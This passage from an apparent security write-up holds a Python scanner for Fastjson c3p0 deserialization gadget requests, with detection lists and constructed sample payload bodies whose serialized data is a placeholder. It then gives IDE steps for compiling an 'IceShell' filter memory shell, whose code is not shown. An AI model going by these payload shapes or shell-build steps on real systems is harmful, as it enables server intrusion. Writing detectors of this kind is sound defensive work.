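    "com.mchange.v2.c3p0.wrapperconnectionpooldatasource",
}
# normalized key -> canonical spelling
SUSPICIOUS_KEYS = {"useroverridesasstring": "userOverridesAsString"}

_UNICODE_ESC = re.compile(r"\\u([0-9a-fA-F]{4})")
_HEX_ESC = re.compile(r"\\x([0-9a-fA-F]{2})")
# "key" : optional "value"  -- tolerant of malformed JSON such as "java.lang.Character"{
_KEY_VALUE = re.compile(r'"((?:[^"\\]|\\.)*)"\s*:\s*(?:"((?:[^"\\]|\\.)*)")?')


def decode_escapes(body: str) -> str:
    """Resolve \\uXXXX and \\xXX escapes so matching happens on what the parser will see."""
    body = _UNICODE_ESC.sub(lambda m: chr(int(m.group(1), 16)), body)
    return _HEX_ESC.sub(lambda m: chr(int(m.group(1), 16)), body)


def normalize_key(key: str) -> str:
    """Strip every non-alphanumeric character and lowercase: covers Fastjson's smart
    matching (ignores '_' and '-') and any other junk inserted into a field name."""
    return re.sub(r"[^0-9a-zA-Z]", "", key).lower()


def scan_body(body: str) -> list:
    """Return a list of findings for one request body; an empty list means nothing matched."""
    text = decode_escapes(body)
    findings = []
    if text != body:
        findings.append({"kind": "escaped-body"})  # escapes were used to hide tokens
    for m in _KEY_VALUE.finditer(text):
        key, value = m.group(1), m.group(2)
        if key == "@type" and value is not None and value.lower() in SUSPICIOUS_TYPES:
            findings.append({"kind": "type-probe", "value": value})
        canonical = SUSPICIOUS_KEYS.get(normalize_key(key))
        if canonical:
            findings.append({"kind": "gadget-key", "raw_key": key, "obfuscated": key != canonical})
        if value is not None and value.startswith("HexAsciiSerializedMap:"):
            findings.append({"kind": "serialized-map", "key": key})
    return findings


# Constructed sample bodies (the hex after aced0005 is a placeholder, not a real stream)
SAMPLES = {
    "plain": '{"a":{"@type":"java.lang.Class","val":"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource"},'
             '"b":{"@type":"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource",'
             '"userOverridesAsString":"HexAsciiSerializedMap:aced0005deadbeef;"}}',
    "underscore": '{"b":{"@type":"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource",'
                  '"user_Overrides_As_String":"HexAsciiSerializedMap:aced0005deadbeef;"}}',
    "unicode": r'{"b":{"@type":"com.mchange.v2.c3p0.Wrapper\u0043onnectionPoolDataSource",'
               r'"\u0075serOverridesAsString":"HexAsciiSerializedMap:aced0005deadbeef;"}}',
    "probe": '{"x":{"@type":"java.lang.Character"{"@type":"java.lang.Class",'
             '"val":"com.mchange.v2.c3p0.DataSources"}}}',
    "benign_login": '{"username":"alice","password":"correct horse battery staple"}',
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(name, scan_body(body))
```

Matching after normalization rather than on the literal keyword is the point: a filter that compares raw bytes is only as strong as the parser's leniency, and Fastjson is lenient about field-name spelling and string escapes.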


Java File Compilation

In IDEA, choose File - New - Project.


Select Java module, next.


Next, fill in the project name FRain.


Click Finish.

Return to the main interface, create a new IceShell.java file under the src directory, right-click src - New - File.


Copy the content of the filter memory shell above.


If dependencies are missing, right-click src - Open Module Settings.


Select Libraries, import the missing jar packages.


After resolving dependencies, you can build by selecting Build - Rebuild to generate the IceShell.class file.
